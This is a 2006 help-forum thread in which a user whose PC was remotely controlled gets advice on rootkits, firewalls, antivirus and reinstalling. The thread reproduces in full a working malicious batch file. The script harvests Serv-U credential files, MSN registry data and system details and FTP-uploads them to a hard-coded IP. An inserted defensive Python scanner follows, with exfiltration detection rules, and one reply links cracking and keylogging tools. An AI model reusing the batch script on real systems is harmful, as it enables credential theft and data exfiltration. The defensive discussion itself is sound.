PaigePeople asked:
Emergency!! Somebody is hacking me, I see them moving the mouse on my desktop

So I saw my desktop mouse begin to move, and they opened Internet Explorer and began to type "bet", and then it was autofilled and they hit return; it began to run an application, but I quickly hit cancel and shut down my computer... I then installed Sygate firewall, but I don't really trust it... I just installed NO virus protection, removed Symantec, just because I don't trust it now after what happened. Also, I am running a router; I disabled port forwarding for now and I just don't know what to do... I'm pretty sure they have installed something over time... Virus protection is not picking it up... What else would I want to run??? Could it be a trojan??? I checked my startup by running a file called startup.exe and msconfig.exe and found nothing odd.... I don't know.
tnapolitano: [solution available to members only]
Rich Rumble:
Trojan or rootkit are possible. Do you have something like VNC, GoToMyPC or pcAnywhere, some sort of remote administration software like those? Otherwise I'd scan the PC either off-line, by removing the HD and placing it in another as a secondary drive, or you can try RootkitRevealer http://www.sysinternals.com/Utilities/RootkitRevealer.html
I prefer McAfee personally and professionally. A firewall like McAfee's or ZoneAlarm's is very good also.
Run the GRC.com Shields Up tests; if you can, turn on the previous settings and see if you have a port exposed that might lead to such an occurrence. https://www.grc.com/x/ne.dll?bh0bkyd2 Run the full scan (all service ports).
-rich
PaigePeople (asker):
I have a firewall, Sygate Personal Firewall, on all computers... I am running lots of virus protection, disabled all network connections, changed settings on the router, changed all passwords... ran some trojan removing software, one found a rootkit.... I disabled all remote connections allowed... everything seems OK at the moment, waiting for virus protection to finish scanning, then I might take some of your steps... just hate to have to wipe out and reinstall all OSes... have 3 computers in the house.....
I will definitely run that RootkitRevealer once the scan is done... I'm going to disable my internet again for a few moments... thanks again!!! I am still in shock over what I saw!!! Pretty crazy to see someone on your desktop opening IE and moving the mouse around and stuff.... wow
OK, so on my computer running Windows Server 2003, with Sygate firewall and Symantec Corporate 9.0 virus protection, I have a web server running and an FTP for uploading website files.... I can definitely close port 21 if needed, but I think this goes way beyond that... First off, the server was not the computer with the mouse being moved around, that was just an everyday client machine... Below are the results from the main client machine... but I am thinking it's showing 80 and 21 open because that is what is being port forwarded on the router in order to keep my buddy's web site running, his restaurant... I also always have the server computer locked and never saw any foul play going on on that computer.... but below are results from the GRC scan:

GRC Port Authority Report created on UTC: 2006-07-01 at 01:42:21

Results from scan of ports: 0-1055

    2 Ports Open
 1047 Ports Closed
    7 Ports Stealth
---------------------
 1056 Ports Tested

Ports found to be OPEN were: 21, 80

Ports found to be STEALTH were: 20, 135, 136, 137, 138, 139,
                                445

Other than what is listed above, all ports are CLOSED.

TruStealth: FAILED - NOT all tested ports were STEALTH,
                   - NO unsolicited packets were received,
                   - NO Ping reply (ICMP Echo) was received.
Look at the running processes on the affected system and post them here.

To find the running processes, do one of the following:

A:
Press Ctrl+Alt+Del
If you get the Windows Security screen, click Task Manager
Go to the Processes tab

B:
Press Ctrl+Alt+Del
Click the Processes tab

eb
I agree with what rpggamergirl posted; you must know what's running on your OS. Check everything: startup, registry, and unfamiliar/unregistered Windows programs running.

Try using HijackThis to see the registry and startup programs.

I understand your reluctance to reinstall the OSes, what with 3 systems. Call this a learning experience.

The thing is, you can no longer trust your system. That means the antivirus, the registry, etc.

Here's an article from Microsoft on how to recover from being hacked (http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx), and a quote from that article:

"The only way to clean a compromised system is to flatten and rebuild. That’s right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications)..."

I agree. Then, to make your life easier in the future, get some imaging software (Ghost, Drive Image) and once you have the systems back in a ready state, image them and store the images. This will save restore time if this should happen again.

You have 3 systems, are you the only user? Are any of these systems being used by inexperienced users? If so, maybe you need to do a little "user awareness training".

Here is a link to some "Practice Safe Computing" from M$.

http://www.microsoft.com/smallbusiness/resources/technology/security.mspx

One in particular I thought applied to you is: "How to shield your network from clever hackers" (http://www.microsoft.com/smallbusiness/resources/technology/security/how_to_shield_your_network_from_clever_hackers.mspx).

It speaks to the considerable threats to which a system/network is still vulnerable after all the firewall, anti-virus and updates have been installed.


OK, so I formatted my computer and I think it was hacked again. My IP won't change; I even called my ISP to try and have them change it, but they couldn't... Anyways, I found some files in a temp folder and a hidme.exe file which hides applications from running... This was one batch file I saw in the temp folder... it's definitely doing something.... Anyways, anybody have a clue what's going on????



ping 127.0.0.1
ping 127.0.0.1
echo %temp%>%temp%\tempa.txt
%temp%\gsar -s:x3a -r:x0d:x0a %temp%\tempa.txt -o
set /p schijf=<%temp%\tempa.txt
del temp.txt
%schijf%:
cd %temp%


del site*.txt
del sysinf*.txt

regedit /e temp.dbf "HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger"
type temp.dbf | find "User.NET Messenger Service">sysinf.txt
dbf>>sysinf.txt
sysinfo>>sysinf.txt

type sysinf.txt | find "FIXED">sysinf2.txt
gsar -s:x3a -r:x0d:x0a -o sysinf2.txt
type sysinf2.txt | find "Drive">sysinf3.txt

:choppen
set /p currentdrive=<sysinf3.txt
echo %currentdrive%>current.txt
type current.txt | find "Drive"
if errorlevel 1 goto laatsteschijf
gsar -s"Drive " -r"" -o current.txt
set /p currentdrive=<current.txt
sed 1d sysinf3.txt>sysinf4.txt
copy /Y sysinf4.txt sysinf3.txt
echo ================================================================>>site.txt
echo ================================================================>>sate.txt
dir %currentdrive%:\sites.dat*.* /s >>site.txt
ping 127.0.0.1
ping 127.0.0.1

dir %currentdrive%:\servuadmin.ini*.* /s >>sate.txt
type site.txt | find "\">>site2.txt
type sate.txt | find "\">>sate2.txt
gsar -s"%currentdrive%":x3a  -r"999999999%currentdrive%":x3a -o site2.txt
gsar -s"%currentdrive%":x3a  -r"999999999%currentdrive%":x3a -o sate2.txt
gsar -s"999999999" -r:x0d:x0a -o site2.txt
gsar -s"999999999" -r:x0d:x0a -o sate2.txt
type site2.txt | find "\">>maps.txt
type sate2.txt | find "\">>meps.txt
del site2.txt
del site.txt
del sate.txt
del sate2.txt

ping 127.0.0.1
ping 127.0.0.1

goto choppen

:laatsteschijf
echo laatste schijf
type maps.txt | find "\"
if errorlevel 1 goto klaarmetsites
set /p pad=<maps.txt
echo "DEZE SITES.DAT KOMT UIT DE MAP %pad%">>temp.txt
type "%pad%\sites.dat">>temp.txt
sed 1d maps.txt>maps2.txt
copy /y maps2.txt maps.txt
echo ******************************************************************************************************>>temp.txt
goto laatsteschijf


:klaarmetsites
echo laatste schijf
type meps.txt | find "\"
if errorlevel 1 goto klaarmetdit
set /p pad=<meps.txt
echo "DEZE SERVUADMIN.INI (DUMPBEHEERDER-INIFILE) KOMT UIT DE MAP %pad%">>temp.txt
type "%pad%\servuadmin.ini">>temp.txt
sed 1d meps.txt>meps2.txt
copy /y meps2.txt meps.txt
echo ******************************************************************************************************>>temp.txt
goto laatsteschijf


pause
:klaarmetdit

type sysinf.txt >>temp.txt
type sysinf.txt | find "Mac Address">mac.txt
gsar -s" " -r"" -o mac.txt
gsar -s:x3a -r"" -o mac.txt
gsar -s"MacAddress" -r"" -o mac.txt
set /p mac=<mac.txt
del mac.txt
ren temp.txt %mac%.exe

echo open 62.166.34.66>todo.txt
echo user dmk>>todo.txt
echo dmk>>todo.txt
echo quote pasv>>todo.txt
echo mput %mac%.exe>>todo.txt
echo y>>todo.txt
echo **GEUPLOAD_MET_VERSIE07**>>todo.txt
echo quit>>todo.txt
ftp -s:todo.txt -n

ping 127.0.0.1
del todo.txt

echo open 62.166.34.66>todo.txt
echo user dmk>>todo.txt
echo dmk>>todo.txt
echo mput %mac%.exe>>todo.txt
echo y>>todo.txt
echo **GEUPLOAD_MET_VERSIE08**>>todo.txt
echo quit>>todo.txt
ftp -s:todo.txt -n
attrib -h *.*
del todo.txt


echo klaar
del sysinf*.txt
del %mac%.exe
del current.txt
del maps*.txt
del /F /Q *.*
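Added here as a defender-side example (not from the thread or any poster): a static triage of a batch file for the behaviours the posted start.bat shows, namely a scripted `ftp -s:` upload to a hard-coded host, searches for Serv-U `sites.dat`/`servuadmin.ini` files, a registry export, renaming collected text to `.exe`, and a final `del /F /Q *.*`. The sample input is a constructed excerpt modelled on that script; the host 192.0.2.10 and the credentials are placeholders, not values from the thread.

```python
import os
import re

# Constructed excerpt modelled on the posted start.bat (not the original file).
# Host and credentials are placeholders.
SAMPLE_BAT = r"""
regedit /e temp.dbf "HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger"
dir %currentdrive%:\sites.dat*.* /s >>site.txt
dir %currentdrive%:\servuadmin.ini*.* /s >>sate.txt
type "%pad%\servuadmin.ini">>temp.txt
ren temp.txt %mac%.exe
echo open 192.0.2.10>todo.txt
echo user example>>todo.txt
echo secret>>todo.txt
echo mput %mac%.exe>>todo.txt
ftp -s:todo.txt -n
del /F /Q *.*
"""

# Each rule: (name, regex, what it means to the analyst). Patterns are
# case-insensitive because cmd.exe is.
RULES = [
    ("ftp_scripted_upload", re.compile(r"^\s*ftp\s+.*-s:", re.I | re.M),
     "ftp driven by a script file: unattended transfer of collected data"),
    ("hardcoded_ftp_host", re.compile(r"echo\s+open\s+([^\s>]+)", re.I),
     "FTP target written into the script"),
    ("cred_file_harvest", re.compile(r"sites\.dat|servuadmin\.ini", re.I),
     "searches every fixed drive for Serv-U config/credential files"),
    ("registry_export", re.compile(r"^\s*regedit\s+/e\b", re.I | re.M),
     "exports a registry key to a file"),
    ("data_renamed_as_exe", re.compile(r"^\s*ren\s+\S+\s+\S+\.exe", re.I | re.M),
     "renames the collected text to .exe (camouflage for the upload)"),
    ("self_cleanup", re.compile(r"^\s*del\s+/F\s+/Q\s+\*\.\*", re.I | re.M),
     "wipes the working directory after exfiltration"),
]


def triage_batch(text):
    """Return the matched rule names, the FTP host if one is hard-coded,
    and a score equal to the number of rules hit."""
    findings, ftp_host = [], None
    for name, rx, _why in RULES:
        m = rx.search(text)
        if m:
            findings.append(name)
            if name == "hardcoded_ftp_host":
                ftp_host = m.group(1)
    return {"findings": findings, "ftp_host": ftp_host, "score": len(findings)}


def scan_directory(path, threshold=2):
    """Triage every .bat/.cmd under path (e.g. a user's Temp folder) and
    return {file: result} for those hitting at least `threshold` rules."""
    hits = {}
    for root, _dirs, files in os.walk(path):
        for fn in files:
            if fn.lower().endswith((".bat", ".cmd")):
                full = os.path.join(root, fn)
                with open(full, errors="replace") as fh:
                    result = triage_batch(fh.read())
                if result["score"] >= threshold:
                    hits[full] = result
    return hits
```

Point `scan_directory` at a copy of the Temp folder taken from a system you suspect; a script hitting several rules at once, like the one above, is worth pulling for a closer look even when the installed AV is silent.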

[Asker-certified solution available to members only]
If you are getting a dynamic IP from your ISP, the only way to change the IP is to leave the computer disconnected from the internet (or off) for 8 days (that is assuming your ISP is using the standard 8-day lease for an IP address). This way, when you reconnect you should get a new IP.

I can not tell you exactly what that .bat file does, but I can tell you it is NOT GOOD.

After you formatted and reinstalled the OS, did you install anything else? If so, what?

eb
As for leaving my computer unhooked for 8 days, that would be serious withdrawal!!!! Not sure I could do that... I tried leaving it unhooked for 12 hours one day to renew the IP because I was told to try that, but it didn't work, and that was hard :) Anyways, the only stuff I installed were the basics, like Office 2003, Sygate Personal Firewall, Symantec 9.0 Corporate Edition, and Anapod, which is software for my iPod, Winamp, and DVD Decrypter, DVD Shrink and that's it.... I did all updates and virus protection was up to date.... Not a big fan of Sygate Personal Firewall, seems to allow a lot of incoming traffic... I say yes to some things such as ECHO REQUEST and some other stuff that I thought was associated with Windows, but maybe I'm accepting his incoming connection..... Wow, this stinks that I have to format again.... So how well does ZoneAlarm work??? And is there a better virus protection software I should use other than Symantec?? I always thought Symantec was good, and basically that's how I found out about this problem: it detected a threat known as HideRUN, found in my temp folder:

C:\Documents and Settings\kwatkins\Local Settings\Temp\

HideRun.exe
When you reformatted, did you do a quick or full format? Some viruses may not be wiped out by a quick format, as all that does is delete the FAT table (tells the OS where the files are). You may want to go to the HD manufacturer's website and see if they have a low-level format utility. This will completely clear the drive of any residual data; then reinstall the OS.

Are the apps you are installing things you downloaded, or purchased, or bootlegged? If downloaded or bootlegged, then the install files may be infected. Use Symantec (with updated defs) to scan install CDs before installing anything.

eb
Also what is the name of the .bat file you mentioned above?
You might as well format again, :)

You can delete the .exes or bat files in the temp folders but you really need to find the trojan that they used to drop those files in the first place.
Yeah, I might format again tonight or tomorrow. As for the programs, they are all legit copies... I either got them from work or I bought them, but most come from work... I actually do support at work, but I guess I am not as smart as they think I am... Most of the problems I deal with are super easy, so I don't run into too many crazy problems like this.. Anyways, the name of that bat file is start.bat, and there is also another one called startit.bat, which basically just runs the hiderun.exe file. This is what's in that bat file: %temp%\hiderun.exe "%temp%\start.bat"    and the other one is posted above, called start.bat.... so startit.bat must be the first to run and then it loads start.bat   oy vay
The IP is of no real concern, even if it switched, some ISP's use dynamic DNS, so even if the IP changes, the name might stay the same. Besides, this program is dial-in home via MSN in my opinion, and your ip is of no consequence to it running, as long as you have a connection to the internet.
I find that McAfee is better than symantec over all, better virus detection, configurable overhead, spy-ware and mal-ware detection greater than most AV products. If you just have McAfee AV only, get ZoneAlarm (pro recommended). But the McAfee+Firewall is very very good in my opinion.
McAfee for instance detects (mid-download) these programs that Norton doesn't detect until they are run, or scanned on the HD after being downloaded.
http://ntsecurity.nu/toolbox/kerbcrack/ http://ntsecurity.nu/toolbox/klogger/  http://ntsecurity.nu/toolbox/fakegina/
http://www.oxid.it/cain.html http://www.openwall.com/john/  http://www.openwall.com/passwords/dl/pwdump/pwdump4.zip
Not that those programs have viri in them, however they could be used for "evil".

ZoneAlarm, and mcafee's firewall, not only do ingress filtering, but they also do egress filtering, which is outbound traffic monitoring.
-rich
P.S. I agree with richrumble, the IP you have is not a concern... The hack is outbound, so your system must make the contact first.

eb
I am trying ZoneAlarm Suite as of now, using the 15-day trial. I do like it better than Symantec's firewall program I am using; it seems to give you a bit more info about what's going on.. It is currently scanning my computer for viruses. I noticed it has found two as of now, but the thing is, I have some network drives mapped and it's scanning those as well. I didn't set up the options before I scanned and remove those drives/folders from being scanned; it's about 2 hours into the scan and I just don't want to cancel it now!!! I wonder if I hit the SKIP button (supposed to cancel the scan) if that will allow me to remove those two viruses it found, or if I will have to scan C:\ again completely and then remove the viruses after the scan is complete.... Hmmmmm. And I did see that boohoo worm page on Symantec when I first searched Google about the bat file... I guess I will follow the directions and see if it did do most of those things listed on that page.... So you guys are saying that the bat file is trying to dial out?? Not using my cable modem to do stuff?? If that's the case, I don't even have a modem installed... well, I don't have a phone line hooked up to it... I wonder what exactly is going on here!!!! Why me, why do people have to hack into other people's computers...!!!
"dial out" in this case does not mean using a modem and phone lines, in this case "dial out" refers to your system making a connection to another system on the internet allowing that system to control yours.

What viruses were found?

Oh, and just an FYI, I left my Symantec firewall and virus protection installed along with the ZoneAlarm Suite and they all seem to be working fine together... I didn't think that would work out, but so far it is!!!
Usually does not work out.

BTW, if your system is already infected with a virus when you installed ZoneAlarm, a scan may not be accurate.

I would use Symantec's free online virus scan found at: http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=ie&venid=sym

eb
Also, I just looked at both of those virus pages on Symantec's website, and nothing was found in my registry or my services that matched the website's removal instructions...
It just says infections found - 2, but it's still scanning, so I didn't want to stop it... I'm hoping it finishes pretty soon, or maybe I will try hitting the skip button and see what viruses I have.
If it's scanning network drives, just disconnect the network; then it will stop scanning them... or the scan may crash. (May be worth the risk)

eb
Then it may be a different virus...

eb
BAT.IRCFlood     said it removed it....
Yeah, seems to be gone..... so I wonder if I really need to format now..... I might just to be safe... but not until tomorrow.... hmmmm
Run the online virus scan from Symantec; this will run without interference from any virus that may be on your computer. If that comes up clean, I would say your system is clean. Delete all the .bat and other files mentioned above (best to do this in safe mode).

Once you have your system stable, disable System Restore and reboot once (this will clear all the restore points, as one of them may be infected); after rebooting it's OK to enable System Restore again.

Instructions for disabling System Restore are in the Symantec links I posted.

eb
System Restore should be turned off, then a scan made; after a reboot it's OK to turn it back on, but I leave it off. McAfee vs Symantec is for a different topic, I'll make my comments there; still, it boils down to "to each their own", like religion. Rootkits or "hideme's", like the one this author seems to have, will avoid detection from online scans as well as installed AV scans. Try RootkitRevealer: http://www.sysinternals.com/Utilities/RootkitRevealer.html If possible, scan your HD in another PC: remove your HD, place it in another PC as a secondary drive, and then have that PC boot up and scan your HD while it's mounted as a secondary drive.
Here is some good scary reading http://www.phrack.org/show.php?p=62&a=12
Read up on best practices and alternate browsers also http://xinn.org/win_bestpractices.html http://www.xinn.org/annoyance_spy-ware.html
-rich
OK guys, I will follow these last instructions and then divide the points up how I see fit, definitely giving richrumble and ebjers the most though; they did help the most, I believe.. If anybody sees it differently, let me know... I will probably divide the points tomorrow.... Just want to make sure my system is running smoothly and whatnot.... Thanks again!!!
Make sure your system is clean before you close the ? and split the points.

eb
Glad to hear everything's okay.

Thanks!